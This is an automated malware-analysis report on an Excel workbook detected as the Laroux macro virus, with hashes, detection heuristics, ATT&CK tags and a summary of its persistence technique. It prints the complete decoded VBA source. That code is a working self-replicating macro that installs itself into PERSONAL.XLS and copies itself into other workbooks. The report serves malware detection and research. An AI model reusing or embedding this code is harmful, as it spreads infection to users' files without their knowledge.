Xls.Trojan.Laroux-14 — Office (OLE) malware analysis

Static analysis result for SHA-256 e0162a1d67b034bf…

MALICIOUS

Office (OLE)

243.0 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: fec0b7020496aaea973458a9a1e35465 SHA-1: 156bd4fbc131a7543439dcc47fdb4fa8bde01f81 SHA-256: e0162a1d67b034bffe970945f348b291fa00ff5b7a4903f005974d9caecd48d0
240 Risk Score

Malware Insights

Xls.Trojan.Laroux-14 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The file is identified as a known Excel macro virus, specifically Xls.Trojan.Laroux-14, by multiple heuristics and ClamAV. The VBA script contains an Auto_Open macro designed to copy itself into the PERSONAL.XLS workbook, a common technique for establishing persistence. This allows the malware to execute automatically whenever Excel is launched.

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-14 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Laroux-14
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4000 bytes
SHA-256: 6fc043b2432ab43eb009848b952c0dd45770e6f7a4853d328c0ea4ab51ff53c3
Detection
ClamAV: Xls.Trojan.Laroux-14
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "kustyk"


Dim OldMacro$

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "check_kustyk"
End Sub

Sub check_kustyk()
Attribute check_kustyk.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim WhichFile
    Dim Dopisal As Boolean
    
    c4$ = CurDir()

    c$ = Application.StartupPath
    mp$ = c$ & "\" & "PERSONAL.XLS"
    m$ = Dir(mp$)
    Application.ScreenUpdating = False
    
    WhichFile = 0
    If m$ <> "PERSONAL.XLS" Then
        WhichFile = 1
    Else
        WhichFile = 2
        If Workbooks("PERSONAL.XLS").Modules.Count > 0 Then
            For i = 1 To Workbooks("PERSONAL.XLS").Modules.Count
                If Workbooks("PERSONAL.XLS").Modules(i).Name = "kustyk" Then
                    WhichFile = WhichFile + 1
                    Exit For
                End If
            Next
        End If
        If WhichFile > 2 Then
            If ActiveWorkbook.Modules.Count > 0 Then
                For i = 1 To ActiveWorkbook.Modules.Count
                    If ActiveWorkbook.Modules(i).Name = "kustyk" Then
                        WhichFile = WhichFile + 1
                        Exit For
                    End If
                Next
            End If
        End If
    End If
    ChDir c4$
    
    Select Case WhichFile
    Case 1
        On Error GoTo Blad_Zapisu1
        n4$ = ActiveWorkbook.Name
        Sheets("kustyk").Visible = True
        Sheets("kustyk").Select
        Sheets("kustyk").Copy
        With ActiveWorkbook
            .Title = ""
            .Subject = ""
            .Author = ""
            .Keywords = ""
            .Comments = ""
        End With
        newname$ = ActiveWorkbook.Name
        Modules.Add
        Sheets("kustyk").Visible = False
        c4$ = CurDir()
        ChDir Application.StartupPath
        ActiveWindow.Visible = False
        Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "PERSONAL.XLS", FileFormat:=xlNormal _
            , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
            False, CreateBackup:=False
        Application.OnSheetActivate = "personal.xls!check_kustyk"
        GoTo Pracuj_Dalej1
Blad_Zapisu1:
        Application.OnSheetActivate = ""
Pracuj_Dalej1:
        On Error GoTo 0
        ChDir c4$
        Windows(n4$).Visible = True
        Workbooks(n4$).Sheets("kustyk").Visible = False
    
    
    Case 2
        n4$ = ActiveWorkbook.Name
        On Error GoTo Blad_Zapisu2
        Sheets("kustyk").Visible = True
        Sheets("kustyk").Select
        Windows("PERSONAL.XLS").Visible = True
        Workbooks(n4$).Sheets("kustyk").Copy before:=Workbooks("PERSONAL.XLS").Sheets(1)
        Workbooks("PERSONAL.XLS").Sheets("kustyk").Visible = False
        Windows("PERSONAL.XLS").Visible = False
        Workbooks("PERSONAL.XLS").Save
        Application.OnSheetActivate = "personal.xls!check_kustyk"
        GoTo Pracuj_Dalej2
Blad_Zapisu2:
        Windows("PERSONAL.XLS").Visible = False
        Application.OnSheetActivate = ""
Pracuj_Dalej2:
        On Error GoTo 0
        Workbooks("PERSONAL.XLS").Saved = True
        Sheets("kustyk").Visible = False
    
    
    Case 3
        n4$ = ActiveWorkbook.Name
        p4$ = ActiveWorkbook.Path
        s$ = Workbooks(n4$).Sheets(1).Name
        If s$ <> "kustyk" Then
            Workbooks("PERSONAL.XLS").Sheets("kustyk").Visible = True
            Workbooks("PERSONAL.XLS").Sheets("kustyk").Copy before:=Workbooks(n4$).Sheets(1)
            Workbooks("PERSONAL.XLS").Sheets("kustyk").Visible = False
            Workbooks(n4$).Sheets("kustyk").Visible = False
            Workbooks("PERSONAL.XLS").Save
        End If
        Application.OnSheetActivate = ""
        Application.OnSheetActivate = "personal.xls!check_kustyk"
    Case Else
    End Select
    Application.ScreenUpdating = True
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.